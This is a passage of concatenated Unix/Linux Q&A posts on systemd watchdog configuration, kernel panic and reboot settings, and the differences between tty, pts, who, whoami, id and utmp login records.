May 05 13:33:37 DIET systemd[1]: my.service: Watchdog timeout (limit 3min 10s)!
May 05 13:33:37 DIET systemd[1]: my.service: Killing process 11155 (bash) with signal SIGABRT.
May 05 13:33:37 DIET systemd[1]: my.service: Killing process 11157 (docker) with signal SIGABRT.
May 05 13:33:37 DIET systemd[1]: my.service: Main process exited, code=killed, status=6/ABRT
May 05 13:34:53 DIET bash[11155]: [GOOGLE][INFO][17:34:53]: Sent message: {'ip': ['x'], 'versions': {}, 'temperature': 33.916, 'cpu': 0.9, 'memory': 47.8, 'net': {'out': 9.882, 'in': 6.336}}The notify is sent when the '[GOOGLE][INFO]' lines are shown. There is only about 2 minutes between the first one and the timeout meaning it never got reset. Thanks in advance !
EDIT: Running this service outside of docker works properly.
|
Systemd Watchdog & Notify through Docker
|
So I was able to achieve the software watchdog.
By doing this.
#include <systemd/sd-daemon.h>

sd_notify(0, "READY=1");    // in my constructor
sd_notify(0, "WATCHDOG=1"); // in my timer, every 10 seconds
|
I am using an embedded linux environment. I have created a service which starts a qt application.
[Unit]
Description=AutoStart App
[Service]
Type=simple
ExecStartPre=/home/root/Clean_Application.sh
ExecStart=/home/root/Startup_Script.sh
WatchdogSecs=10min
NotifyAccess=all
Restart=always
StartLimitInterval=5min
StartLimitBurst=4
StartLimitAction=reboot-force
[Install]
WantedBy=multi-user.target
Then I try to reset the timer by running the following steps.
export NOTIFY_SOCKET=/run/systemd/notify
systemd-notify READY=1
I then get the MAINPID by using the systemctl status command,
set the MAINPID with systemd-notify MAINPID=$PID
and try to reset the timer by running
systemd-notify WATCHDOG=1
I have tried every combination of this setup but nothing resets the timer. I tried changing Type=notify and running systemd-notify "WATCHDOG=1" but nothing seems to work.
How can I troubleshoot this script?
|
Unable to reset systemd watchdog timer
|
It looks like the watchdog is still running when the kernel tries to reboot, and the system still fails to reboot. That indicates a possible firmware/hardware issue: when the kernel stops running, the watchdog should eventually (typically within 10 minutes) force the system to reboot even if the kernel fails to trigger it in the normal way.
If the exact model is Asus VivoMini UN45, here is a list of BIOS updates for it. When you select "Show all" on that page, you'll see that many of the updates have a comment "Improve system stability". If you have a version that is older than one of those updates, updating the BIOS might very well fix your problem.
To know your current BIOS version, run sudo dmidecode -s bios-version. With Asus PCs and motherboards, this command should report a four-digit number that corresponds to the versions listed on the Asus support page for that specific model.
|
My machine sometimes does not properly reboot. I am not sure what triggers it to work or not work. It happens sometimes both during automatic reboots when unattended-upgrades tries to reboot as well as during manual reboot (sudo shutdown -r now).
It seems the machine will stop the services but not actually perform the hardware reboot in the end. If I connect a screen, the last system messages displayed are:
[timestamp] watchdog: watchdog0 did not stop
[timestamp] reboot: Restarting system
I know that it is not just a delay issue; it will stay like this for days and not reboot.
OS: Debian GNU/Linux 9 (stretch)
Kernel: Linux 4.9.0-8-amd64 #1 SMP Debian 4.9.110-3+deb9u4 (2018-08-21) x86_64 GNU/Linux
Hardware: Asus VivoMini Intel N3000
Any ideas what might be wrong?
|
Reboot sometimes hangs [closed]
|
Create a systemd service unit as described here and be sure to include the line "Restart=always". Systemd is the Arch equivalent of upstart. A minimal configuration would look like:
[Service]
ExecStart=<full path to script>
Restart=always
You may need to invoke the interpreter directly and provide your script as an argument, depending on the shebang used in your script.
|
I would like a method as described here to set a watchdog to keep a python script alive, but in archlinux.
Thanks
EDIT
Solved using the example provided by smokes2345. I created a python_script.service in /etc/systemd/system/ with the following content:
[Service]
Type=simple
ExecStart=/home/fernando/PycharmProjects/get_tweets/get_tweets.py
Restart=always
|
Watchdog for py script in archlinux
|
After my investigations, I figured out that the Linux kernel does not disable the watchdog on boot; it actually uses a timer to reset the watchdog, and when the kernel oopses or panics it keeps resetting the watchdog, so the system won't restart on a watchdog timer overflow.
Following this answer to this question, from man proc:
/proc/sys/kernel/panic
This file gives read/write access to the kernel variable panic_timeout. If this is zero, the kernel will loop on a panic; if nonzero it indicates that the kernel should autoreboot after this number of seconds.
It is obvious that a nonzero value should be passed to this file. According to this answer, to pass a value to /proc/sys/kernel/panic we should modify /etc/sysctl.conf and add the parameter kernel.panic = 3 for 3 seconds of wait before restarting after a kernel panic has occurred.
But that did not fix my problem. By investigating other panic-related issues I found, again from man proc:
/proc/sys/kernel/panic_on_oops (since Linux 2.5.68)
This file controls the kernel's behavior when an oops or BUG is encountered. If this file contains 0, then the system tries to continue operation. If it contains 1, then the system delays a few seconds (to give klogd time to record the oops output) and then panics. If the /proc/sys/kernel/panic file is also nonzero then the machine will be rebooted.
And my problem was not a panic, but a kernel oops! So by adding kernel.panic_on_oops = 1 to /etc/sysctl.conf, the /proc/sys/kernel/panic_on_oops flag is changed to 1, and now whenever the kernel oopses, it restarts after 3 seconds.
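Both knobs can be inspected with plain reads from /proc (no root needed); setting them, as described above, needs root. A sketch:

```shell
# 0 means: loop forever on panic / try to continue after an oops
cat /proc/sys/kernel/panic
cat /proc/sys/kernel/panic_on_oops

# The persistent fix from /etc/sysctl.conf, applied immediately
# (root required, hence commented out here):
# sysctl -w kernel.panic=3
# sysctl -w kernel.panic_on_oops=1
```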
|
We know that by opening /dev/watchdog the watchdog activates, and that by sending it a character at least once a minute it is reset; the instructions are here.
The processor used on the BBB, the AM335x, enables its internal watchdog by default. But when U-Boot or Ubuntu starts, this watchdog is disabled, and after the OS has booted up /dev/watchdog can be used.
I want to ensure that the watchdog works even when U-Boot or the kernel can't boot. So how can this be done?
The kernel and U-Boot should not disable the watchdog timer.
The default timeout of the watchdog should be more than a minute before U-Boot starts the kernel, so that the OS can boot up completely.
I need to mention that changing some parts of the U-Boot code or the Linux kernel code is acceptable, but an external watchdog is not an option.
|
Enable watchdog timer of BeagleBone Black which works even if os could not boot
|
A tty is a native terminal device, the backend is either hardware or kernel emulated.
A pty (pseudo-terminal device) is a terminal device which is emulated by another program (for example: xterm, screen, or ssh). A pts is the slave part of a pty.
(More info can be found in man pty.)
Short summary:
A pty is created by a process through posix_openpt() (which usually opens the special device /dev/ptmx), and is constituted by a pair of bidirectional character devices:The master part, which is the file descriptor obtained by this process through this call, is used to emulate a terminal. After some initialization, the second part can be unlocked with unlockpt(), and the master is used to receive or send characters to this second part (slave).
The slave part, which is anchored in the filesystem as /dev/pts/x (the real name can be obtained by the master through ptsname() ) behaves like a native terminal device (/dev/ttyx). In most cases, a shell is started that uses it as a controlling terminal.
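The split is visible from the shell. script(1) from util-linux (assumed installed) is one such emulating program: it opens the master side via /dev/ptmx and runs its child on the slave, so the child's controlling terminal is a /dev/pts/N node even when the parent has no terminal at all:

```shell
# stdin of this script itself may or may not be a terminal:
tty || true

# script allocates a pty pair and runs the command on the slave side,
# so the child reports a /dev/pts/N device as its terminal:
script -qc 'tty' /dev/null
```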
|
Possible Duplicate:
What is the exact difference between a 'terminal', a 'shell', a 'tty' and a 'console'? I always see pts and tty when I use the who command, but I never understood how they are different. Can somebody please explain this to me?
|
Difference between pts and tty
|
Yes, it's a joke, included by the developers of the who command. See the man page for who.
Excerpt:
If FILE is not specified, use /var/run/utmp. /var/log/wtmp as FILE is common. If ARG1 ARG2 given, -m presumed: 'am i' or 'mom likes' are usual.
This U&L Q&A titled: What is a "non-option argument"? explains some of the terminology from the man page, and my answer also covers alternatives to who .. .... commands.
Details
There really isn't anything special about am I or am i. The who command is designed to return the same results for any 2 arguments. Actually it behaves as if you called it with its -m switch.
-m only hostname and user associated with stdin
Examples
$ who -m
saml pts/1 2014-01-06 09:44 (:0)
$ who likes candy
saml pts/1 2014-01-06 09:44 (:0)
$ who eats cookies
saml pts/1 2014-01-06 09:44 (:0)
$ who blah blah
saml pts/1 2014-01-06 09:44 (:0)
Other implementations
If you take a look at The Heirloom Project, you can gain access to an older implementation of who.
The Heirloom Toolchest is a collection of standard Unix utilities. Highlights are:
Derived from original Unix material released as Open Source by Caldera and Sun.
The man page that comes with who in this distribution also has the same "feature", except it's more obvious.
$ groff -Tascii -man who.1 |less
...SYNOPSIS
who [-abdHlmpqRrstTu] [utmp_file]
who -q [-n x] [utmp_file]
who [am i]
who [am I]
...
...
With the two-argument synopsis forms `who am i' and `who am I', who
tells who you are logged in as.
...
...
|
I stumbled across a blog that mentioned the following command.
who mom likes
It appears to be equivalent to
who am i
The author warns never to enter the following into the command line (I suspect he is being facetious):
who mom hates
There is nothing documented about the mom command. What does it do?
|
Is `who mom likes` a real linux command?
|
The following analysis applies when booting to graphical.target.
ps -el |grep -v ?
F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME CMD
4 S 0 683 1 0 80 0 - 4867 - tty1 00:00:00 agetty
4 S 0 901 686 1 80 0 - 63109 - tty7 00:00:10 Xorg
0 S 1000 2390 2388 0 80 0 - 7368 - pts/0 00:00:00 bash
0 R 1000 2465 2390 0 80 0 - 3935 - pts/0 00:00:00 ps
0 S 1000 2466 2390 0 80 0 - 4446 - pts/0 00:00:00 grep
1. tty7 and tty1-tty6
tty7 is a kind of virtual terminal, like tty1-tty6.
Proof 1: in the output of ps -el | grep -v ? above, the third line shows tty7.
Proof 2: man chvt says:
chvt - change foreground virtual terminal.
You can switch between tty1-tty7 with sudo chvt n (n ranges from 1 to 7).
tty7 belongs to the tty family and is a kind of virtual terminal, but it is in GUI mode, unlike tty1-tty6 which are in text mode.
2. pts
pts means pseudo-tty slave, which is used together with the pseudo-terminal master.
For the pts structure of a telnet session, see Figure 4 ("Description of a telnet session") on the web page Description of a telnet session.
When bash (ps, grep) runs on Xorg as in my example, the pts structure is something like the graph below (enlightened by R.Koula, author of Description of a telnet session). The controlling terminal for bash (ps, grep) is pts/0.
3.:0
w
09:36:09 up 24 min, 1 user, load average: 0.11, 0.25, 0.29
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
debian8 :0 :0 09:12 ?xdm? 5:13 0.13s /usr/bin/lxsess
ps -lC lxsession
F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME CMD
4 S 1000 1585 1574 0 80 0 - 91715 - ? 00:00:00 lxsession
From ps -lC lxsession it is obvious that lxsession is a daemon which has no controlling terminal, so w can't yield info such as a tty number (from 1 to 7) or a pts/number.
w yields :0, meaning local:display #0, describing the fact that on the hardware side, Xorg is running at local display #0.
|
Please help me distinguish pts from the GUI mode generated from a tty.
booting to multi-user.target
I did this:
sudo systemctl set-default multi-user.target
reboot
login with regular user debian8
ctrlaltf2 and login with regular user debian8 too.
run startx to switch into gui
run tty and who, which said:
$ tty
/dev/pts/0
$ who
debian8 tty1 2017-01-09 20:22
debian8 tty2 2017-01-09 20:23
Why is the output of who not this instead?
who
debian8 tty1 2017-01-09 20:22
debian8 :0 2017-01-09 20:23
I have run startx to enter into gui mode, and tty said pts/0. So why does who output tty2 not :0?
My confusion after the explanation by Kusalananda:
When tty is run, we get /dev/pts/0. But look at the above. In the TTY column of the output of w, the row for startx says tty2. Why is it not :0?
What is the difference between /dev/pts/0 and tty?
The tty2 output when I start X with xinit /etc/X11/xinit/xinitrc -- /etc/X11/xinit/xserverrc :0 vt2 -auth /tmp/serverauth.451rqHm1NC — is it a pts or not? It outputs
$ tty
/dev/pts/0
This says that the tty here is a pts, I think.
booting to graphical.target
I did this:
sudo systemctl set-default graphical.target
reboot
login with regular user debian8
run tty, yielding
$ tty
/dev/pts/0
ctrlaltf2 and login with regular user debian8 too.
run tty, yielding
$ tty
/dev/pts/1
run w
There are two GUIs. They can be switched between with ctrlaltf1 and ctrlaltf2.
Running the command tty, both terminals say /dev/pts/0 or /dev/pts/1. But look at the output of w above. Why does the terminal column for /usr/bin/lxsession -s LXDE -e LXDE say :0? And why does the terminal column for xinit /etc/X11/xinit/xinitrc -- /etc/X11/xinit/xserverrc :1 vt2 -auth /tmp/serverauth.k7JPJJEAHJ say tty2?
What is the difference between pts and tty and :0?
|
What is the difference between **pts** and **tty** and **:0**?
|
I am logged in as root in my shell; typing who gives this output.
who
root tty1 2014-08-25 14:01 (:0)
root pts/0 2014-09-05 10:22 (:0.0)
root pts/3 2014-09-19 10:08 (xxx.xxx.edu)
It effectively shows all the users that have established a connection. Now suppose I log in as another user:
ssh ramesh@hostname
Running who again will result in another entry for the user ramesh.
who
root tty1 2014-08-25 14:01 (:0)
root pts/0 2014-09-05 10:22 (:0.0)
root pts/3 2014-09-19 10:08 (xxx.xxx.edu)
ramesh pts/4 2014-09-19 12:11 (xxx.xxx.edu)
Inside the root shell, I just do su ramesh and then run whoami. It will give me the current user, ramesh, as the output.
Effectively, who gives the list of all users currently logged in on the machine and with whoami you can know the current user who is in the shell.
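The distinction is also visible in where each command gets its data: whoami asks the kernel for the effective UID of its own process (so it always works, even in a container), while who reads the utmp login table (so it only lists interactive logins, and may print nothing where none exist):

```shell
# whoami behaves like "id -un": both resolve the effective UID
# through the passwd database, without touching utmp.
whoami
id -un

# who reads /var/run/utmp instead; after "su ramesh" it still shows
# the original login, and in a utmp-less environment it prints nothing.
who || true
```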
|
The man page description of who command is
who - show who is logged on
But there exists a similar command whoami. The man page description of whoami is
whoami - print effective userid
Can anyone explain what exactly these commands do? How are they different from each other?
|
Difference between who and whoami commands
|
id reports:
the current credentials of its own process; or
the credentials of a named user, as read out of the system account database.
whoami reports the current credentials of its own process.
who and w report the active login sessions table from the login database.
BSD doco notes that whoami does a subset of the job of id, and that id renders it obsolete.
A system does not have to have an active login sessions table. On Linux operating systems and on the BSDs, if the table has not been created at bootstrap, or has been deleted since, the system will operate without one. Logging in and out does not implicitly create it on Linux operating systems, moreover.
Furthermore, the table need not be readable by unprivileged users and neither the who nor the w command will report this as an error.
Further reading
Jonathan de Boyne Pollard (2018). The Unix login database. Frequently Given Answers.
Jonathan de Boyne Pollard (2018). "login-update-utmpx". User Commands. nosh toolset.
Lennart Poettering et al. (2018). systemd-update-utmp.service. systemd manual pages. Freedesktop.org.
Is it necessary for a login-shell to create utmp entry?
https://unix.stackexchange.com/a/409036/5132
|
In command line platforms online, like for instance the one on Codecademy, when I run
for cmd in w who whoami id
do
echo $cmd
$cmd
echo =========================
echo " "
done
I get
w
 00:52:54 up 8 days, 14:10, 0 users, load average: 3.78, 2.98, 2.69
USER  TTY  FROM  LOGIN@  IDLE  JCPU  PCPU  WHAT
=========================
who
=========================
whoami
ccuser
=========================
id
uid=1000(ccuser) gid=1000(ccuser) groups=1000(ccuser)
=========================
Note that only whoami and id output something. When I run the same thing on my computer, I see similar results for all commands.
Why doesn't Codecademy display the user for w and who? What's different about these commands?
|
Different outputs for `w`, `who`, `whoami` and `id`
|
After reading Centimane's comment on /var/run/utmp and searching differently, I found this fedora forum thread, which mentioned the issue is provoked by a bug in GDM, which creates a bad entry in /var/run/utmp. Eventually I even found a bug report for it and another here.
|
In a RHEL 7.3 server, I was trying to find logged-in users. I ran w and it told me there were two users, but it only showed me the info of one (myself); then I ran who, which displayed the other user as (unknown). Finally, I ran lastlog, with whose output I could match the login date and port from who's output and find that the unknown user actually is gdm.
$ w
09:33:36 up 4 days, 15:22, 2 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
myusr pts/0 172.16.23.113 09:32 0.00s 0.06s 0.03s w
$ who
(unknown) :0 2017-07-01 18:13 (:0)
myusr pts/0 2017-07-06 09:32 (172.16.23.113)
$ lastlog
Username Port From Latest
...
gdm :0 Sat Jul 1 18:13:23 -0500 2017
...
The server is a Supermicro machine and from time to time I connect to it using IPMI2's KVM-over-LAN feature. But I don't remember anything weird happening when connecting like that.
This doesn't seem normal. What could have happened?
|
who shows (unknown) user logged-in: what's going on?
|
The -T and --message switches mean that who will display a +, -, or ? denoting whether the user is allowing messages to be written to their terminal.
`--writable'
After each login name print a character indicating the user's
message status: `+' allowing `write' messages
`-' disallowing `write' messages
`?' cannot find terminal device
Example
$ who --message
saml - tty1 2013-11-03 16:09 (:0)
saml + pts/0 2013-11-03 16:10 (:0.0)
saml + pts/1 2013-11-03 16:49 (:0.0)
saml + pts/6 2013-11-04 12:28 (:0.0)
saml + pts/20 2013-11-05 13:16 (:0.0)
saml + pts/43 2013-11-05 16:58 (:0.0)
The -T switch does the same thing.
What are messages?
Messages is a facility in Unix where people can write messages directly into someone else's terminal device.
Example
$ write
usage: write user [tty]
saml on tty1 has his message receive capability disabled (-).
$ write saml tty1
write: saml has messages disabled on tty1However user saml is allowing messages on pts/0:
$ write saml pts/0
hola
If I switch over to the tab that corresponds to pts/0:
[saml@grinchy ~]$
Message from saml@grinchy on pts/43 at 17:06 ...
hola
Enabling/Disabling the status
You can use the command mesg to enable and disable this feature in a given terminal.
Messages is enabled.
$ who --message | grep "pts/0"
saml + pts/0 2013-11-03 16:10 (:0.0)
Turn it off.
$ mesg n
Now it's disabled.
$ who --message | grep "pts/0"
saml - pts/0 2013-11-03 16:10 (:0.0)
|
I found the following in man who:-T, -w, --mesg add user's message status as +, - or ?
--message same as -T
--writablesame as -TSo looked up info who and found-w -T --mesg --message --writable After each login name print a character indicating the user's message status
+ allowing 'write' messages
- disallowing 'write' messages
? 'cannot find terminal device'
Question: What 'message', which kind of 'message', is meant?
|
'who --message' -> which message?
|
It's easier to just do it with sort:
who | sort -u -k1,1
The -u flag asks for "unique" lines (suppress duplicates). The key flag (-k) says to only consider the first word in each line for purposes of sorting and uniqueness.
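For example, on canned who-style output (the usernames and sessions are invented for illustration):

```shell
# Two sessions for alice collapse to one line, because only field 1
# (the username) participates in the comparison under -k1,1 with -u.
printf '%s\n' \
  'alice tty1  2014-09-05 10:22' \
  'alice pts/0 2014-09-05 10:25' \
  'bob   pts/3 2014-09-05 11:08' |
  sort -u -k1,1
```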
|
I want to show the online users using the who command, but I want unique output without any duplicates. I piped the output into awk, but I am not very familiar with it. Is this the right way, and how should I proceed?
|
Print unique of who command
|
Not necessarily. Either line 2 or line 3 is the terminal (e.g. xterm) that you are using to run the ssh command.
Because it's the terminal, not the ssh connection.
Complete coincidence. If you consider a Windows user connecting to the server using PuTTY, they will not have a local pts, and neither will they have the who command to run.
You can try running the following to see which pts the ssh command is running in:
ps -AF | grep sshYou should see a pts listed against the ssh command you are using to connect. This is the pts of the xterm (or KDE/Gnome terminal etc) that you are using to run ssh.
ssh itself is connecting to the server using TCP, which you can see using:
ss | grep ssh
|
After an ssh connection, if I run the who command on the server, I have this response:
olivia@olivia-pc:~$ who
olivia :0 2014-09-08 11:40 (:0)
olivia pts/0 2014-09-08 11:43 (:0)
olivia pts/10 2014-09-08 13:54 (sim.local)So it's easy to identify the incoming connection (third line).
If I run the who command on the client, I have this response:
who
sim :0 2014-09-04 16:30 (:0)
sim pts/10 2014-09-08 13:49 (:0)
sim pts/0 2014-09-08 13:46 (:0)So I think that the outgoing connection is the second line because it appears after that I connect to the server with ssh, but I don't understand why is it still there when I run who after that I have closed the connection (and until I leave the terminal).
So my questions are :
1) Is it really the second line that represents the outgoing connection and why?
2) Why is it still visible until I leave the terminal, even if I close the connection?
3) If the outgoing connection is line two, as I expect it to be, is there a reason that the server and client use the same pseudo-terminal number?
|
Identify the outgoing connection (ssh) with the who command
|
stty and older versions of who am i will issue error messages when they're not connected to a tty device. stty checks stdin (fd 0); I don't know what file descriptor who checks. To avoid getting those error messages, the usual workaround has been to use the -t option of test (more commonly known as [) to check if the shell is connected to a tty.
if [ -t 0 ]
then
ID=`who am i | awk '{print $1}'`
else
ID="unknown"
fiIn your case, you can surround the entire logic that sets up the PS1 variable in that if statement, since PS1 only makes sense when one is working on a tty.
The following is the relevant section from the explanation of test in the link above.
-t file_descriptor
True if file descriptor number file_descriptor is open and is associated with a terminal. False if file_descriptor is not a valid file descriptor number, or if file descriptor number file_descriptor is not open, or if it is open but is not associated with a terminal.
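The behaviour of [ -t 0 ] is easy to check: with stdin redirected from /dev/null it reports false, so the guard above falls back to "unknown". A cut-down sketch of that guard (the function name is just for illustration):

```shell
# Redirecting stdin simulates the non-interactive case that the
# background process hits; the who branch is then never executed.
get_id() {
  if [ -t 0 ]; then
    who am i | awk '{print $1}'
  else
    echo unknown
  fi
}

get_id < /dev/null    # prints "unknown"
```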
|
I made some modifications to the /home/user/.envfile so the PS1 prompt would show date/time as well as the pwd etc.
The modification is:
# `who am i` is used to obtain the name of the original user
case `who am i | awk '{print $1}'` in
'someuser')
#set the prompt to include the date and time
set -o allexport
unset _Y _M _D _h _m _s
eval $(date "+_Y=%Y;_M=%m;_D=%d;_h=%H;_m=%M;_s=%S")
((SECONDS = 3600*${_h#0}+60*${_m#0}+${_s#0}))
typeset -Z2 _h _m _s
_tsub="(_m=(SECONDS/60%60)) == (_h=(SECONDS/3600%24)) + (_s=(SECONDS%60))"
_timehm='${_x[_tsub]}$_h:${_m}'
_timehms='${_x[_tsub]}$_h:$_m:${_s}'
_timedhms=$_Y'/'$_M'/'$_D" "'${_x[_tsub]}$_h:$_m:${_s}'
_hn=`hostname`
typeset -u _hn
# `whoami` is used here to display the name of the 'su' user
_un=`whoami | awk '{print $1}'`
typeset -u _un
export PS1="$_timedhms
"'['$_un']'$_hn':${PWD#$HOME/} $ '
set +o allexport
;;
*)
;;
esac
The prompt should look like:
2014/08/07 11:08:24
[su'd username]hostname:/home/username $
As you can see, this makes use of whoami to display the name of the current user in the prompt.
Certain processes we run through this account are complaining:
who: 0551-012 The process is not attached to a terminal.
Do not run who am i as a background process.
Usage: who [-AabdHilmpqrsTtuwX?] [am {i,I}] [utmp_like_file]
Is there any way to prevent that modification from affecting this other process? Possibly by detecting when the process is not attached to a terminal?
|
Is there a way to prevent a non-terminal-attached process from executing 'who' inside my .envfile?
|
TL,DR: you probably want /proc/PID/loginuid, even though its behavior doesn't always match logname. But it doesn't work out of the box on all distributions. Note that my answer assumes Linux, it does not apply to other Unix variants.
I don't think you'll find a fully satisfactory answer, because you don't have clear expectations of what logname does. On the one hand, you're currently using logname, which is based on utmp records: records that associate a user with a terminal, and which are updated at the discretion of the terminal emulator (many don't bother). On the other hand, you expect that “the possibility to change the username should be limited to the superuser”. That is not the case with utmp records! As explained in the very comment thread you cite, utmp records work most of the time, but they can be faked.
Defining “the username that was used to log into the console” is problematic. It's clear enough in nominal cases, but there are many complicated ones. What happens if a user calls su and attaches to another user's screen session? What happens if a user attaches to another user's X11 or VNC session? How do you trace processes to terminals, and what do you do about processes that have no controlling terminal?
Linux actually does have a concept of “login UID”. It's visible for each process as /proc/PID/loginuid. This information is tracked by the kernel, but it's up to userland to let the kernel know when a login takes place. This is normally done via pam_loginuid. Under the hood it's done by writing to /proc/self/loginuid. Linux's login UID follows process ancestry, which is not always the right definition but has the benefit of being simple.
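The login UID can be inspected directly from the shell. A Linux-specific sketch (getent is used here only to map the numeric UID back to a name):

```shell
# Read the kernel-tracked login UID of the current process (Linux only).
# 4294967295 is (uid_t)-1: no login session was ever recorded.
luid=$(cat /proc/self/loginuid)
if [ "$luid" = "4294967295" ]; then
    echo "no login UID recorded"
else
    # map the numeric UID to a user name via the passwd database
    echo "login UID $luid = $(getent passwd "$luid" | cut -d: -f1)"
fi
```

Unlike utmp, this value survives su and setuid transitions, since the kernel copies it across fork and exec.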
Beware that if a process's login UID is 4294967295 then the process may change it. Init starts with the login UID 4294967295 (equal to -1 as a 32-bit value); this normally indicates a process that's not part of any login session. As long as the login process sets the login UID correctly (just before it sets the real UID from root to the user who's logging in), that's fine. But if there's a way to log in without the login UID set then the user may declare any login UID of their choice. So this information is reliable only if all the ways to run a process on the system go through a step of setting the login UID — forget one and the information becomes useless.
Experimentally, on a Debian jessie machine, all my long-running processes whose login UID is -1 are system services. But there are ways to run a process with a login UID of -1, for example via incron. I don't know how many other ways there are; incron was the first I tried and it worked. On an Ubuntu 16.04 machine, the pam_loginuid entry for lightdm is commented out; I haven't investigated why. Maybe Ubuntu's lightdm and incron should be considered security bugs, but the fact is that today you can't rely on the login UID working out of the box on major distributions.
See also Loginuid, should be allowed to change or not (mutable or not)?, which is about a kernel option to prevent root from changing the login UID. But beware that it's only effective after the login UID has been set to a proper value; if a user gets to run a process with the login UID still set to -1 then they can set it to whatever they want. It would in fact be safer to make init switch to a different value, say -2, and have pam_loginuid override that value; then -1 would never happen and -2 would indicate “unknown”.
|
The logname utility became unusable a while ago for many users, since it relies on something that has been broken intentionally due to security concerns, as discussed here. As I read the discussion, it is unlikely that the functionality is going to come back.
I lived with workarounds for a while, but now I feel they are starting to catch up with me, so I'm searching for a proper long-term solution, and I'm surprised to see that there does not seem to be much out there.
The solution most commonly linked to is presented here, but it originates from here, which also hints that the proposed solution via the SUDO_USER environment variable is not portable.
Another proposed solution is to create a file containing the username and to write a bash alias or similar to emulate the logname functionality, but I wouldn't call this a proper replacement, since it assumes a degree of control over the environment that is rarely available.
The solution via who from here is interesting, but I could not find any information about whether it has relevant reliability or portability limitations.
Apart from those approaches, the air gets thin fast in this area, so I decided to ask here in the hope of some new input on the topic and my thoughts so far.
|
A proper replacement for the `logname` utility? [closed]
|
First, who does not care about login shells, or anything such. It merely dumps utmp entries. You can have an entry for non-login terminals; for graphical sessions; for FTP connections (with a completely made-up tty "line" name); for just about anything.
Second, utmp entries are created manually – you only get an entry if the program which processes your login calls pututline(…). For example, sshd always does this, terminal emulators often do this (but not always), and su never does.
(Remember that su does not allocate a new pty, so it can't add a utmp entry either – otherwise you'd end up with multiple entries for the same tty, which can confuse a few programs.)
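The difference is easy to see from the shell: whoami reports the effective user unconditionally, while a utmp lookup via who am i comes up empty when nothing registered the terminal. A sketch (exact who output varies by platform):

```shell
# Effective user: derived from the UID, always available.
effective=$(whoami)
# utmp user: empty under su, cron, or emulators that skip pututline().
utmp_user=$(who am i 2>/dev/null | awk '{print $1}')
echo "effective=$effective utmp=${utmp_user:-<none>}"
```

Run after su, the two values diverge: whoami shows the new effective user, while the utmp column still shows whoever owned the terminal's entry, or nothing at all.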
|
My observation:

If I open a new terminal (gnome/lx):
New /dev/pts/X is used
who does not list these
First character of echo $0 is not -, so it's not a login shell.

If I ssh into the same machine with the same user:
New /dev/pts/X is used
who lists these
First character of echo $0 is -, so it's a login shell.

If I open a new tty (Ctrl-Alt-Fxx):
New /dev/ttyXX is used
who lists these
First character of echo $0 is -, so it's a login shell.

If I run su -:
Same /dev/pts/X is used (where su - was issued)
who does not list these
First character of echo $0 is -, so it's a login shell.

Conclusion: Creating a new pty does not automatically create an entry in utmp (?)

Question: If who displays the list of currently logged-in users, then it should display an entry for each login shell (?). But it does not display an entry for the root user logged in via su -, why?

EDIT: Another thing I can conclude at this point: "It has to be a new pty/tty and a login shell; only then is a new entry created in utmp."
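These observations can be reproduced with a small check that looks up the current terminal's line name in who's output (a sketch; it assumes who prints the line in its second column, as POSIX specifies):

```shell
# Does the current terminal have a utmp entry?
line=$(tty 2>/dev/null | sed 's,^/dev/,,')
if [ -n "$line" ] && who | awk '{print $2}' | grep -qx "$line"; then
    echo "utmp entry exists for $line"
else
    echo "no utmp entry for this terminal"
fi
```

Running this inside ssh prints the first message; inside a terminal emulator that skips pututline(), or after su -, it prints the second, matching the table above.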
|
Is it necessary for a login-shell to create utmp entry?
|